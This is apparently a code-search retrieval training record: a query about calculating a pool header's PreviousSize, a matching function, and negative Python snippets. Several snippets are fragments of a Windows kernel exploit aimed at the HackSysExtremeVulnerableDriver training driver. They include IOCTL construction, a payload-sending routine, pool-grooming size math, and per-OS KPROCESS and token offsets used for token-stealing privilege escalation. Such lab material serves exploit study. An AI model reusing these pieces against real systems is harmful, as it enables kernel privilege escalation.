= x[1].get('x')\n node_y = x[1].get('y')\n node_list = (node_y, node_x)\n return node_list\n\n start_time = time.time()\n\n # start = (103.9028788, 1.4044948)\n # end = (103.8999124, 1.4035004)\n # start = (103.9073345, 1.4060506)\n # end = (103.9172982, 1.3956014)\n #\n # start = (103.9073345, 1.4060506)\n # end = (103.9172982, 1.3956014)\n\n # start = (103.910650, 1.400818)\n # end = (103.910296, 1.399252)\n\n # start =(103.9024 , 1.4052)\n # end = (103.897332 , 1.402272)\n\n # start = (103.91256451606752, 1.402580108598971)\n # end = (103.91270935535432, 1.401523634635178)\n\n start_osmid = 0\n end_osmid = 0\n punggol = (1.403948, 103.909048)\n # G = ox.graph_from_point(punggol, distance=3500, truncate_by_edge=True, network_type=\"walk\")\n G = ox.load_graphml('AStar_walk.graphml')\n nodelist_G = list(G.nodes.values())\n\n \"\"\"\n Start finding start and end Node ID.\n If not found, find nearest node from the given coordinates by the user\n \"\"\"\n for i in range (0, len(nodelist_G)):\n if nodelist_G[i].get('y') == start[1] and nodelist_G[i].get('x') == start[0]:\n start_osmid = nodelist_G[i].get('osmid')\n if nodelist_G[i].get('y') == end[1] and nodelist_G[i].get('x') == end[0]:\n end_osmid = nodelist_G[i].get('osmid')\n\n if start_osmid == 0 or end_osmid == 0:\n start_osmid = ox.get_nearest_node(G, (start[1], start[0]))\n end_osmid = ox.get_nearest_node(G, (end[1], end[0]))\n\n \"\"\"\n To calculate distance from 2 x,y axis\n \"\"\"\n R = 6371.0\n snlat = radians(start[1])\n snlon = radians(start[0])\n elat = radians(end[1])\n elon = radians(end[0])\n actual_dist = 6371.01 * acos(sin(snlat) * sin(elat) + cos(snlat) * cos(elat) * cos(snlon - elon))\n actual_dist = actual_dist*1000\n edgelist_G = list(G.edges.values())\n\n\n \"\"\"\n After having start and end nodes.\n The program will set a radius of 200 meters from start and end nodes\n Every nodes within 200 meters and is a bus stop node will be captured and stored in end1 and end2\n If within 200meters no bus stop is found, it will have a constant increment of 200meters until bus stop if found on both sides\n \"\"\"\n bus_G = bus_layer(start_osmid,end_osmid, None, 1)\n start1 = start\n start2 = end\n\n for i in bus_G:\n temp_dis = calculate_H(bus_G.get(i)[2],bus_G.get(i)[1],start1[1], start1[0])\n bus_G.get(i).append(temp_dis)\n temp_dis = calculate_H(bus_G.get(i)[2], bus_G.get(i)[1], start2[1], start2[0])\n bus_G.get(i).append(temp_dis)\n end1 = []\n end2 = []\n limit = 0\n while (len(end1) == 0):\n limit += 200\n for i in bus_G:\n if bus_G.get(i)[3] < limit:\n temp = []\n temp.append(bus_G.get(i)[3])\n temp.append(bus_G.get(i)[0])\n temp.append(bus_G.get(i)[1])\n temp.append(bus_G.get(i)[2])\n hq.heappush(end1, temp)\n limit = 0\n while (len(end2) == 0):\n limit += 200\n for i in bus_G:\n if bus_G.get(i)[4] < limit:\n temp = []\n temp.append(bus_G.get(i)[4])\n temp.append(bus_G.get(i)[0])\n temp.append(bus_G.get(i)[1])\n temp.append(bus_G.get(i)[2])\n hq.heappush(end2, temp)\n\n \"\"\"\n The following codes will capture all nodes on the road that is closest to the bus stop\n It will be stored in path1 and path2.\n \"\"\"\n path1 = []\n for i in range (0, len(end1)):\n if 1847853709 == end1[i][1]:\n path1 = []\n path1.append([2019165453, 0, 0, 0, 0])\n break\n else:\n path1.append(get_nearestedge_node(end1[i][1], end1[i][3], end1[i][2]))\n\n for x in range (0, len(path1)):\n path1[x].append(calculate_H(path1[x][3],path1[x][2], start1[1], start1[0]))\n\n path2 = []\n for i in range (0, len(end2)):\n path2.append(get_nearestedge_node(end2[i][1], end2[i][3], end2[i][2]))\n for x in range (0, len(path2)):\n path2[x].append(calculate_H(path2[x][3],path2[x][2], start2[1], start2[0]))\n\n \"\"\"\n Bus results will store all data obtained from lta datamall\n It will start calculating all possibilities from all bus stop captured in end1 and end2\n Example, end1 contains [1,2,3], end2 contains [4,5,6]\n The following code will start to find a route from [1,4] , [1,5] , [1,6] then [2,4] , [2,5] , [2,6] then [3,4] , [3,5] , [3,6]\n Once all these route is found, it will proceed to compare the derived routes and capture the least amount of bus stop\n Example, [1,4] is the shortest route found\n Upon capturing the route with the least amount of bus stop, it will start to plot the walking A* algorithm from start point to bus stop\n Example, [Start point, 1] then [End point, 4]\n In this case, it will return [[Start point,1] , [1,4] , [End point,4]]\n \"\"\"\n # bus_results = bus_details_all()\n # with open(\"data\\ltadatamall.txt\",\"w+\") as filehandler:\n # json.dump(bus_results,filehandler)\n with open(\"data\\ltadatamall.txt\", \"r\") as filehandler:\n bus_results=json.load(filehandler)\n approved = 0\n path1_end_count = 0\n path2_end_count = 0\n for i in range (0, len(end1)):\n if 1847853709 == end1[i][1]:\n approved = 1\n final_route_list = []\n if approved == 1:\n count = 99\n for x in range (0, len(end2)):\n final_route_list = bus_layer(1847853709, end2[x][1], bus_results, None)\n try:\n if len(final_route_list) < count:\n path1[path1_end_count][0] = 4598672210\n path2_end_count = x\n temp_route_list = final_route_list.copy()\n count = len(temp_route_list)\n except:\n continue\n else:\n count = 99\n if len(final_route_list) == 0:\n for i in range (0, len(end1)):\n for x in range (0, len(end2)):\n final_route_list = bus_layer(end1[i][1], end2[x][1], bus_results, None)\n if final_route_list == -1:\n continue\n if len(final_route_list) < count:\n path1_end_count = i\n path2_end_count = x\n temp_route_list = final_route_list\n count = len(temp_route_list)\n\n path1 = walk_pathfinder(start_osmid, path1[path1_end_count][0])\n path2 = walk_pathfinder(end_osmid, path2[path2_end_count][0])\n walking_Path1 = []\n walking_Path2 = []\n bus_path = []\n walking_Path2.append((end[1], end[0]))\n for x in path1:\n walking_Path1.append(find_XY(x, G))\n for x in path2:\n walking_Path2.append(find_XY(x, G))\n\n #ox.plot_graph_routes(G, [path1, path2])\n plotting_route = []\n \"\"\"\n Upon capturing all the bus routes and walking routes, it will proceed to return the route for further processing\n \"\"\"\n\n a = ox.load_graphml('WalkBus_end_graph.graphml')\n try:\n for x in temp_route_list:\n plotting_route.extend(x)\n plotting_route = delete_duplicate(plotting_route)\n Tried = True\n except:\n return [[0], [0], [0]]\n try:\n #ox.plot_graph_route(a, plotting_route)\n for x in plotting_route:\n bus_path.append(find_XY(x, a))\n except:\n #ox.plot_graph_routes(a, temp_route_list)\n Tried = False\n for x in plotting_route:\n for i in x:\n bus_path.append(find_XY(i, a))\n\n # print(\"TEST - Start OSMID: \", start_osmid)\n # print(\"TEST - End OSMID: \", end_osmid)\n # print(\"TEST - Path 1: \" ,path1)\n # print(\"TEST - Path 1 (X,Y): \", walking_Path1)\n # print(\"TEST - Path 2: \" ,path2)\n # print(\"TEST - Path 2 (X,Y): \", walking_Path2)\n # print(\"TEST - BusRoute: \", plotting_route)\n # print(\"TEST - Bus Path (X,Y): \", bus_path)\n # ox.plot_graph_route(G, final_path, fig_height=10, fig_width=10)\n if Tried == True:\n return [walking_Path1, bus_path, walking_Path2]\n else:\n return [walking_Path1, bus_path, walking_Path2]\n\n print(\"--- %s seconds ---\" % (time.time() - start_time))", "def performOverflow(self, call):\n overFlowDest = self.getOverflowDest()\n if not overFlowDest:\n self.huntGroup.member_to_distribute = 0\n PrintLog(\"+++++++Debug: Under construction+++++\")\n return\n PrintLog(\"Waiting overflow timeout %s sec\" % self.overflowTimeout)\n time.sleep(self.overflowTimeout)\n if overFlowDest.tserver <> self.tserver:\n overFlowDest = self.trunk(self, overFlowDest)\n if InTrue(GetOption(\"CofFeature\")):\n call.ViaExtRouter = 1\n call.external = 1\n pt = self.partyToDistribute()\n thirdPartyDNRole = PartyRole.Destination\n if pt.Role == PartyRole.ConferenceMember and len(pt.Call.PartyList) >= 3:\n thirdPartyDNRole = PartyRole.ConferenceMember\n thirdPartyDN = \"Trunk\"\n addPrm = {\"ThirdPartyDN\": thirdPartyDN, \"ThirdPartyDNRole\": thirdPartyDNRole}\n if not self.routeRequestOnQueued:\n ev = self.mayBeEvent(EventName.Diverted, pt, timeout=3, addPrm=addPrm)\n else:\n addPrmRU = {\"ReferenceID\": 0, \"Reasons\": None, \"ThirdPartyDN\": thirdPartyDN,\n \"ThirdPartyDNRole\": thirdPartyDNRole}\n ev = self.mayBeEvent(EventName.RouteUsed, pt, timeout=3, addPrm=addPrmRU)\n ev = self.mayBeEvent(EventName.Diverted, pt, timeout=3, addPrm=addPrm)\n if not ev:\n pt.postponedAbandonedOrDiverted = 1\n self.postponedAbandonedOrDiverted = self.postponedAbandonedOrDiverted + 1\n pt.removeFromCall()\n ringPt = overFlowDest.ring(call)\n return ringPt", "def request(self, flow: mitmproxy.http.HTTPFlow):", "def request(self, flow: mitmproxy.http.HTTPFlow):", "def forward_pass(self):", "def test_request_floodprotection(self, kasserver, kasapi):\n floodprotection = mock.PropertyMock(text=\"0.0\")\n kasapi.side_effect = [\n zeep.exceptions.Fault(\"flood_protection\", detail=floodprotection),\n mock.DEFAULT,\n ]\n kasserver._request(self.REQUEST_TYPE, self.REQUEST_PARAMS)\n assert kasapi.call_count == 2", "def response_handling(self) -> global___Snippet.StreamingResponseHandling:", "def response_handling(self) -> global___Snippet.StreamingResponseHandling:", "def squares_streaming_get():\n \n return 'do some magic!'", "def rest(self):\n\t\tpass", "def aiomanhole_start():\n if aiomanhole:\n aiomanhole.start_manhole(port=7113, namespace={\"qtile\": qtile})", "def box_mesh_with_hole(point1=Point(0,0,0), point2=Point(2,1,1), cyl_cent1 = Point(1, -10, 0.5), \n cyl_cent2= Point(1, 10, 0.5), cyl_rad=0.25, numpts=15):\n Router = mshr.Box(point1, point2)\n Rinner = mshr.Cylinder(cyl_cent1, cyl_cent2, cyl_rad, cyl_rad)\n domain = Router - Rinner\n\n mesh = mshr.generate_mesh(domain, numpts)\n print_mesh_stats(mesh)\n \n return mesh", "def response_space():", "def drip():\n args = CaseInsensitiveDict(request.args.items())\n duration = float(args.get(\"duration\", 2))\n numbytes = min(int(args.get(\"numbytes\", 10)), (10 * 1024 * 1024)) # set 10MB limit\n code = int(args.get(\"code\", 200))\n\n if numbytes <= 0:\n response = Response(\"number of bytes must be positive\", status=400)\n return response\n\n delay = float(args.get(\"delay\", 0))\n if delay > 0:\n time.sleep(delay)\n\n pause = duration / numbytes\n\n def generate_bytes():\n for i in xrange(numbytes):\n yield b\"*\"\n time.sleep(pause)\n\n response = Response(\n generate_bytes(),\n headers={\n \"Content-Type\": \"application/octet-stream\",\n \"Content-Length\": str(numbytes),\n },\n )\n\n response.status_code = code\n\n return response", "def server_streaming(self) -> global___Snippet.ServerStreaming:", "def ping():\r\n return make_response(\"pong!\", 200)" ]
[ "0.5570328", "0.5281889", "0.5272379", "0.5115745", "0.50628465", "0.50628465", "0.50479513", "0.4986393", "0.4922898", "0.49148694", "0.49118787", "0.48944783", "0.48906896", "0.48570713", "0.4851796", "0.48151433", "0.47973892", "0.47973892", "0.4777782", "0.47701412", "0.47643784", "0.47643784", "0.47630107", "0.47448343", "0.47387558", "0.47287935", "0.47245643", "0.4714223", "0.47093368", "0.46953785" ]
0.564251
0
Calculate the previous size value for the pool header The PreviousSize value 8 = previous chunk
def calculate_previous_size(required_hole_size): return required_hole_size/8
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def prev_size(self):\n return self.state.memory.load(self.base, self._chunk_size_t_size) & ~CHUNK_FLAGS_MASK", "def pupil_size(self):\n\t\t\n\t\t# get newest pupil size\n\t\tps = self.eyetribe.pupil_size()\n\t\t\n\t\t# invalid data\n\t\tif ps == None:\n\t\t\treturn -1\n\t\t\n\t\t# check if the new pupil size is the same as the previous\n\t\tif ps != self.prevps:\n\t\t\t# update the pupil size\n\t\t\tself.prevps = copy.copy(ps)\n\t\t\n\t\treturn self.prevps", "def _make_chunk_size(self, req_size):\n size = req_size\n size += 2 * self._chunk_size_t_size # Two size fields\n size = self._chunk_min_size if size < self._chunk_min_size else size\n if size & self._chunk_align_mask: # If the chunk would not be aligned\n size = (size & ~self._chunk_align_mask) + self._chunk_align_mask + 1 # Fix it\n return size", "def chunk_size(self) -> global___Expression:", "def __get_size(self):\n\t\treturn 4*self.version + 17", "def prev_chunk(self):\n if self.is_prev_free():\n return PTChunk(self.base - self.prev_size(), self.state)\n else:\n raise SimHeapError(\"Attempted to access the previous chunk, but it was not free\")", "def update_size(self):\n return 3 + self.memory_unit_size", "def check_size(prev, current, delta):\n before = prev.pools[0].used\n after = current.pools[0].used\n assert delta == (before - after) >> 20", "def _total_chunk_size_left(self):\n if self.streaming_type == 'reshape':\n return self.N_l // self.conv_factor\n elif self.streaming_type == 'mask':\n return self.N_l // self.conv_factor * self.n_layers\n elif self.unidir:\n return 10000 // self.conv_factor\n else:\n return 10000 // self.conv_factor", "def __header_size(self):\n return self.SIZE_LINEUPS + self.SIZE_PLAYERS_PER_LINEUP", "def calc_size(self):\r\n pass", "def header_size(self):\n return 5", "def get_size(self):\n return len(self.get_payload()) + 4", "def get_msg_size(self):\n return self.MsgSize - self.header_size", "def getSize(self, withPool=False):\r\n if not withPool: return self.func.end_ea - self.func.start_ea\r\n head = self.func.end_ea\r\n\r\n # check if the function is set to have no pool\r\n instSize = self.isThumb() and 2 or 4\r\n endCmt = idc.Comment(self.func.end_ea-instSize)\r\n if endCmt and '<endpool>' in endCmt:\r\n return self.func.end_ea - self.func.start_ea\r\n\r\n while not idc.isCode(idc.GetFlags(head)) :\r\n # manual pool computation, trust and assume that this is the last element in the pool!\r\n if idc.Comment(head) and '<endpool>' in idc.Comment(head):\r\n head += idc.get_item_size(head)\r\n break\r\n # advance to next data element\r\n head += idc.get_item_size(head)\r\n\r\n return head - self.func.start_ea", "def get_num_chunks(self) -> int:", "def hbins_size(self):\n return self.unpack_dword(0x28)", "def getSize(self) -> long:\n ...", "def get_size(self):\n tmpsize = 0\n for variable in self.variables:\n tmpsize += variable.get_size()\n for subchunk in self.subchunks:\n tmpsize += subchunk.get_size()\n self.size.value = tmpsize\n return self.size.value + self.ID.get_size() + self.size.get_size()", "def __payload_size(self):\n return (\n self.SIZE_LINEUP_ID + self.players_per_lineup * self.SIZE_PLAYER) * self.entries.count()", "def size(self):\r\n return self.size.data", "def block_size(self, block_id): # -> int:\n ...", "def getSize(self) -> int:\n ...", "def getSize(self) -> int:\n ...", "def __len__(self):\n # Header + len(group id) + group id + generation id\n size = self.HEADER_LEN + 2 + len(self.group_id) + 4\n # + len(member id) + member id\n size += 2 + len(self.member_id)\n return size", "def size(self):\n # IP header has a minimum size of 20 bytes:\n # - 1 byte for version + IHL\n # - 1 byte for DSCP + ECN\n # - 2 bytes for total length\n # - 2 bytes for identification\n # - 2 bytes for flags + fragment offset\n # - 1 byte for TTL\n # - 1 byte for transport protocol type\n # - 2 bytes for header Checksum\n # - 8 bytes, 2 for each IP address\n return 20 + self.segment.size()", "def pending_nb_bytes(self):\n if self.df_length is not None:\n if self.df_length > 0:\n return self.df_length - len(self.buf)\n\n if self.cf_length is not None:\n if self.cf_length > 0:\n return self.cf_length - len(self.buf)\n \n return 4", "def get_step_size(self):\r\n msg = struct.pack('>2B', 56, 6)\r\n response = self.query(msg)\r\n return response[1]", "def payload_length(self):\n return self.total_length - self.headers_length - _PRELUDE_LENGTH - 4", "def get_size(self):" ]
[ "0.76720065", "0.6390554", "0.6259835", "0.62144953", "0.62106663", "0.6186286", "0.6185693", "0.61436164", "0.61312467", "0.60515755", "0.6026793", "0.58546066", "0.58413696", "0.58153194", "0.58138615", "0.5797905", "0.57794654", "0.5769273", "0.5755982", "0.57471156", "0.5725521", "0.57137173", "0.57094747", "0.57094747", "0.57023764", "0.5693946", "0.56827754", "0.5682293", "0.5672089", "0.56705594" ]
0.71780765
1
Recreate CTL_CODE macro to generate driver IOCTL
def ctl_code(function, devicetype = FILE_DEVICE_UNKNOWN, access = FILE_ANY_ACCESS, method = METHOD_NEITHER): return ((devicetype << 16) | (access << 14) | (function << 2) | method)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def mdlintf_ioctl(module_name: str, data: IOCTLData):\n\tmodule = get_module(module_name)\n\tif module is None:\n\t\treturn MODULE_IOCTL_RESULT_MODULE_NOT_FOUND\n\n\treturn module.ioctl(data)", "def _generate_os_code(self, name, version, bits, extra_info):\r\n name = name.replace(' Linux', '')\r\n name = name.replace('Enterprise', '')\r\n name = name.replace('GNU/Linux', '')\r\n\r\n os_code = name.strip().replace(' ', '_').upper()\r\n\r\n if os_code.startswith('RED_HAT'):\r\n os_code = 'REDHAT'\r\n\r\n if 'UBUNTU' in os_code:\r\n version = re.sub(r'\\.\\d+', '', version)\r\n\r\n os_code += '_' + version.replace('.0', '')\r\n\r\n if bits:\r\n os_code += '_' + bits\r\n\r\n if extra_info:\r\n garbage = ['Install', '(32 bit)', '(64 bit)']\r\n\r\n for obj in garbage:\r\n extra_info = extra_info.replace(obj, '')\r\n\r\n os_code += '_' + extra_info.strip().replace(' ', '_').upper()\r\n\r\n return os_code", "def accelerator_string():\n if is_mac():\n return \"Command\"\n else:\n return \"Ctrl\"", "def get_opcode(self, code):\r\n opcode = int(str(code)[-2:])\r\n return opcode", "def read_idcode_opcode(device, idcode_opcode):\n opcode_length = len(idcode_opcode)\n data = bytearray()\n data.extend((WRITE_BITS_TMS_NVE, 4, 0b11111)) # go to reset\n data.extend((WRITE_BITS_TMS_NVE, 4, 0b00110)) # go to shift-ir\n data.extend((WRITE_BITS_NVE_LSB, opcode_length - 2, int(idcode_opcode))) # shift IDCODE opcode\n data.extend((WRITE_BITS_TMS_NVE, 4, 0b00111)) # go to shift-dr\n data.extend((READ_BYTES_NVE_LSB, 3, 0)) # read command\n device.write(bytes(data)) # send off MPSSE commands\n idcode = device.read(4)[::-1]\n return \"\".join(format(byte, \"08b\") for byte in idcode)", "def send_ioctls(self):\n fd = self._fd\n fcntl.ioctl(fd, UI_SET_EVBIT, EV_SYN) # 0,0,0\n if self._keys: # can be an iterable\n fcntl.ioctl(fd, UI_SET_EVBIT, EV_KEY) # is keyboard\n fcntl.ioctl(fd, UI_SET_EVBIT, EV_MSC) # used, but ?\n if getattr(self._keys, '__iter__', False):\n for v in self._keys:\n fcntl.ioctl(fd, UI_SET_KEYBIT, v)\n else:\n KEY_MAX = 767 # 0x2ff\n for k,v in scancodes.__dict__.items():\n # add every recognised key\n if v < KEY_MAX and k.startswith('KEY_'):\n fcntl.ioctl(fd, UI_SET_KEYBIT, v)\n if self._mouserel: # enable relative mouse movement\n fcntl.ioctl(fd, UI_SET_EVBIT, EV_REL) # is relative device\n fcntl.ioctl(fd, UI_SET_RELBIT, REL_X)\n fcntl.ioctl(fd, UI_SET_RELBIT, REL_Y)\n if self._mouseabs:\n fcntl.ioctl(fd, UI_SET_EVBIT, EV_ABS) # is absolute device\n if getattr(self._mouseabs, '__iter__', False):\n for v in self._mouseabs:\n fcntl.ioctl(fd, UI_SET_KEYBIT, v)\n else:\n fcntl.ioctl(fd, UI_SET_KEYBIT, BTN_TOUCH)\n fcntl.ioctl(fd, UI_SET_KEYBIT, BTN_STYLUS)\n fcntl.ioctl(fd, UI_SET_KEYBIT, BTN_TOOL_PEN)\n fcntl.ioctl(fd, UI_SET_KEYBIT, BTN_TOOL_FINGER)\n fcntl.ioctl(fd, UI_SET_KEYBIT, BTN_TOOL_MOUSE)\n if self._mouserel or self._mouseabs:\n for v in ButtonDefaults:\n fcntl.ioctl(fd, UI_SET_KEYBIT, v)", "def _get_code_command_linux():\n print('Use arrows (or \\'E\\', \\'S\\', \\'W\\',' +\\\n '\\'N\\' + a number) to move or \\'q\\' to give up.')\n return get_char_code.get()", "def device_io_control(hDevice, ioControlCode, input_buffer, output_buffer):\n if input_buffer:\n input_size = len(input_buffer)\n else:\n input_size = 0\n\n if isinstance(output_buffer, int):\n output_buffer = ctypes.create_string_buffer(output_buffer)\n\n output_size = len(output_buffer)\n assert isinstance(output_buffer, ctypes.Array)\n bytesReturned = ctypes.wintypes.DWORD()\n\n status = DeviceIoControl(hDevice, ioControlCode, input_buffer, input_size,\n output_buffer, output_size, bytesReturned, None)\n\n if status != 0:\n return output_buffer[:bytesReturned.value]\n else:\n return None", "def at_ctrl(seq, num):\n at(\"CTRL\", seq, [num, 0])", "def command(dev, code, data='', verbose=False):\n communicate(dev, a2b_hex('A' + code) + data.encode('ascii'), a2b_hex('B' + code), verbose=verbose)", "def _send_payload(payload_ptr, payload_len, code):\n \n FILE_DEVICE_UNKNOWN = 0x22\n FILE_ANY_ACCESS = 0\n METHOD_NEITHER = 3\n\n # Recreate CTL_CODE macro to generate driver IOCTL \n ctl_code = (\n (FILE_DEVICE_UNKNOWN << 16) |\n (FILE_ANY_ACCESS << 14) | \n (code << 2) | \n METHOD_NEITHER\n )\n\n # Create handle to driver \"\"\"\n handle = kernel32.CreateFileA(\n \"\\\\\\\\.\\\\HackSysExtremeVulnerableDriver\", # lpFileName\n 0xC0000000, # dwDesiredAccess\n 0, # dwShareMode\n None, # lpSecurityAttributes\n 0x3, # dwCreationDisposition\n 0, # dwFlagsAndAttributes\n None # hTemplateFile\n )\n\n IO_CTL = kernel32.DeviceIoControl(\n handle, # hDevice\n ctl_code, # dwIoControlCode\n payload_ptr, # lpInBuffer\n c_int(payload_len), # nInBufferSize\n None, # lpOutBuffer\n 0, # nOutBufferSize\n byref(c_ulong()), # lpBytesReturned\n None # lpOverlapped\n )\n \n return kernel32.CloseHandle(handle)", "def _build_menu_command(self, cmd):\n if COMMAND_CHAR[cmd]:\n return COMMAND_CHAR[cmd]+self._newline\n else:\n raise InstrumentProtocolException(\"Unknown command character for %s\" % cmd)", "def set_control(self, control):\n self.o.write_register(self.dev_id, CONTROL, control)", "def encode(self):\n fctrl = 0 | (self.adr << 7) | (self.adrackreq << 6) \\\n | (self.ack << 5) | (self.fpending << 4) \\\n | (self.foptslen & 15)\n data = struct.pack('<LBH', self.devaddr, fctrl, self.fcnt) + self.fopts\n return data", "def _generate_windows_code(self, description):\r\n version_check = re.search(r'Windows Server (\\d+)', description)\r\n version = version_check.group(1)\r\n\r\n os_code = 'WIN_' + version\r\n\r\n if 'Datacenter' in description:\r\n os_code += '-DC'\r\n elif 'Enterprise' in description:\r\n os_code += '-ENT'\r\n else:\r\n os_code += '-STD'\r\n\r\n if 'ith R2' in description:\r\n os_code += '-R2'\r\n elif 'ith Hyper-V' in description:\r\n os_code += '-HYPERV'\r\n\r\n bit_check = re.search(r'\\((\\d+)\\s*bit', description)\r\n if bit_check:\r\n os_code += '_' + bit_check.group(1)\r\n\r\n return os_code", "def gen_cheader(protocol):\n\ts = \"\"\"/* Junior Design Sp2018 Final Project\n * Robot Firmware - RPi <-> Microcontroller Communication\n * Nick Ames 2018\n * WARNING: This file is automatically generated by gen-files.py\n * Any changes you make will be erased.\n */\n#include <stdfix.h>\n#include <stdint.h>\n#include \"config.h\"\n\n\"\"\"\n\ts += \"struct comm_data_t {\\n\"\n\tfor r in protocol:\n\t\ts += \"\\t\" + r.size + \" \" + r.name + \"; /* \" + r.desc + \" */\\n\"\n\ts += \"};\\n\\n\"\n\tfor r in protocol:\n\t\ts += \"%s get_%s(void); /* %s */\\n\"%(r.size, r.name, r.desc)\n\t\ts += \"void set_%s(%s); /* %s */\\n\\n\"%(r.name, r.size, r.desc)\n\ts += \"\"\"extern volatile struct comm_data_t Data;\"\"\"\n\treturn s", "def _write_cmd(self, cmd):\n cmd = cmd & 0x0fff\n for i in range(12):\n j = cmd & 0x0800\n cmd = cmd << 1\n j = j >> 11\n self.wr(0)\n self.data(j)\n self.wr(1)", "def decode_kernel_path(entry_type, word_int, capreg_int):\n if entry_type == KernelEntryType.Interrupt:\n return \"IRQ #{}\".format(word_int)\n elif entry_type == KernelEntryType.UnknownSyscall:\n if word_int & 0xF == SyscallType.DebugPutChar.value[0]:\n return \"DebugPutChar: {}\".format(chr(capreg_int))\n else:\n return \"word = {}\".format(word_int)\n elif entry_type == KernelEntryType.VMFault:\n return \"fault_type = {}\".format(word_int)\n elif entry_type == KernelEntryType.UserLevelFault:\n return \"fault_number = {}\".format(word_int)\n elif entry_type == KernelEntryType.DebugFault:\n return \"fault_vaddr = {}\".format(hex(word_int))\n elif entry_type == KernelEntryType.Syscall:\n word_int <<= 3\n word_bytes = word_int.to_bytes(4, byteorder='big')\n tuple_of_data = unpack(\"u17u1u7u4u3\", word_bytes)\n (invoc_tag, is_fastpath, cap_type, syscall_no, _) = tuple_of_data\n invoc = \"\"\n cap = \"\"\n try:\n invoc = InvocationType(invoc_tag)\n except:\n invoc = \"?\"\n try:\n cap = CapType(cap_type)\n except:\n cap = \"?\"\n return \"{} - [{}, fp:{}, {}]\".format(SyscallType(syscall_no), cap, is_fastpath, invoc)\n\n return \"Unknown\"", "def get_kernel_path_tag(entry_type, word_int, capreg_int):\n if entry_type == KernelEntryType.UnknownSyscall:\n if word_int & 0xF == SyscallType.DebugPutChar.value[0]:\n return chr(capreg_int)\n return None", "def _build_robovac_command(mode, command):\n mcu_ota_header_0xa5 = 0xA5\n cmd_data = (mode.value + command.value)\n\n return bytes([mcu_ota_header_0xa5, mode.value, command.value, cmd_data, 0xFA])", "def init_cmd( cmd_num=0):\n if cmd_num in [12,16,2,4,9,10,13,17,18,24]:\n log.warning(\"Command %d is not supported on SDIO, sending anyway but what are you doing?!\" %cmd_num)\n\n cmd = BinaryValue(bits=48,bigEndian=False)\n cmd[47] = 0 # Start value\n cmd[46] = 1 # Direction , 1 = towards device, 0 = towards host\n cmd[45:40] = BinaryValue(value=cmd_num, bits=6, bigEndian=False).integer\n cmd[0] = 1 # Stop bit\n return cmd", "def controller(code):\n\n def register_controller(func):\n CONTROLLERS[code] = func\n return func\n\n return register_controller", "def _build_return_code_enum():\n prefix = 'XTT_RETURN_'\n codes = {k[len(prefix):]:v for (k, v) in vars(_lib).items() if k.startswith(prefix)}\n return IntEnum('ReturnCode', codes)", "def _build_command(self, code_command):\n if code_command == 'end':\n return roboc_command.RobocCommandExit()\n elif code_command[0] == 'E':\n return roboc_command.RobocMoveEast(int(code_command[1:]))\n elif code_command[0] == 'W':\n return roboc_command.RobocMoveWest(int(code_command[1:]))\n elif code_command[0] == 'S':\n return roboc_command.RobocMoveSouth(int(code_command[1:]))\n elif code_command[0] == 'N':\n return roboc_command.RobocMoveNorth(int(code_command[1:]))\n else:\n print(code_command)\n raise ValueError()", "def gen_python(protocol):\n\ts = \"\"\n\tfor r in protocol:\n\t\tif r.write:\n\t\t\ts += \"def set_%s(value): #%s\\n\"%(r.name, r.desc)\n\t\t\ts += \"\\twrite_reg_raw(%d, \\\"%s\\\", value)\\n\\n\"%(r.number, r.size)\n\t\tif r.read:\n\t\t\ts += \"def get_%s(): #%s\\n\"%(r.name, r.desc)\n\t\t\ts += \"\\treturn read_reg_raw(%d, \\\"%s\\\")\\n\\n\"%(r.number, r.size)\n\treturn s", "def get_control(self):\n return self.o.read_register(self.dev_id, CONTROL)", "def uCSIsBuhid(code):\n ret = libxml2mod.xmlUCSIsBuhid(code)\n return ret", "def register_view_op_c_code(type, code, version=()):\r\n ViewOp.c_code_and_version[type] = (code, version)", "def set_csi_code(self, command, params=[]):\n if command == 'm': # SGR - Select Graphic Rendition\n if params:\n for code in params:\n self.set_sgr_code(code)\n else:\n self.set_sgr_code(0)\n\n elif (command == 'J' or # ED - Erase Data\n command == 'K'): # EL - Erase in Line\n code = params[0] if params else 0\n if 0 <= code <= 2:\n area = 'screen' if command == 'J' else 'line'\n if code == 0:\n erase_to = 'end'\n elif code == 1:\n erase_to = 'start'\n elif code == 2:\n erase_to = 'all'\n self.actions.append(EraseAction('erase', area, erase_to))\n\n elif (command == 'S' or # SU - Scroll Up\n command == 'T'): # SD - Scroll Down\n dir = 'up' if command == 'S' else 'down'\n count = params[0] if params else 1\n self.actions.append(ScrollAction('scroll', dir, 'line', count))", "def write_vk(self, vk_code):\n\n seq = u(\"\\x1b[\") + u(str(vk_code)) + u(\"VK\")\n self.write(seq)" ]
[ "0.55158716", "0.5302109", "0.52316815", "0.5207737", "0.51624715", "0.5111562", "0.5089443", "0.5063132", "0.4975058", "0.4945792", "0.49401814", "0.491681", "0.49117205", "0.4888804", "0.4862059", "0.48531878", "0.48450512", "0.4811114", "0.48106492", "0.48064867", "0.4805722", "0.48000187", "0.47702843", "0.4765244", "0.47636417", "0.4745468", "0.47319442", "0.47097775", "0.4696471", "0.4695514" ]
0.647903
0
Set various structure variables based on OS version
def setosvariablesx64(): KPROCESS = '' FLINK = '' UPID = '' TOKEN = '' version = sys.getwindowsversion() if((version.major == 5) and (version.minor == 2)): # the target machine's OS is Windows Server 2003 print "[*] OS version: Windows Server 2003" KPROCESS = '\x68' TOKEN = '\x60\x01' #0x160 UPID = '\xd8\x00' FLINK = '\xe0\x00' elif((version.major == 6) and (version.minor == 1) and ('1' in version.service_pack)): # the target machine's OS is Windows 7x64 SP1 #tbd print "[*] OS version: Windows 7x64 SP1" KPROCESS = '\x70' TOKEN = '\x08\x02' #0x208 UPID = '\x80\x01' #180 FLINK = '\x88\x01' #188 else: print "[-] No matching OS version, exiting..." sys.exit(-1) return (KPROCESS,FLINK,UPID,TOKEN)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
